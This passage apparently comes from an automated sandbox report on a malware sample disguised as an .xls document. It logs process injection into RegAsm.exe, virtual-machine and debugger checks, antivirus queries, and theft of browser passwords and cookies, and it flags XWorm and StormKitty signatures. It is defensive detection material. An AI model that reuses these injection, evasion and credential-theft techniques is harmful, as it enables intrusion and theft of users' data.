              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2605Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7249Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe TID: 6860Thread sleep count: 328 > 30Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe TID: 6832Thread sleep count: 155 > 30Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe TID: 6744Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5440Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: Amcache.hve.9.drBinary or memory string: VMware
              Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll="
              Source: Amcache.hve.9.drBinary or memory string: vmci.sys
              Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.9.drBinary or memory string: VMware20,1
              Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1783472169.00000000010E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
              Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: rDoc5633276235623657_xls.exe, Program.csReference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
              Source: rDoc5633276235623657_xls.exe, Program.csReference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
              Source: rDoc5633276235623657_xls.exe, Program.csReference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D24008Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeQueries volume information: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected BrowserPasswordDump
              Source: Yara matchFile source: 2.2.RegAsm.exe.6ad0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegAsm.exe.6ad0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR
              Yara detected StormKitty Stealer
              Source: Yara matchFile source: 2.2.RegAsm.exe.6ad0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegAsm.exe.6ad0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR
              Yara detected XWorm
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rDoc5633276235623657_xls.exe PID: 6696, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: Yara matchFile source: 2.2.RegAsm.exe.6ad0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegAsm.exe.6ad0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected BrowserPasswordDump
              Source: Yara matchFile source: 2.2.RegAsm.exe.6ad0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegAsm.exe.6ad0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR
              Yara detected StormKitty Stealer
              Source: Yara matchFile source: 2.2.RegAsm.exe.6ad0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegAsm.exe.6ad0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR
              Yara detected XWorm
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rDoc5633276235623657_xls.exe PID: 6696, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR

              Mitre Att&ck Matrix

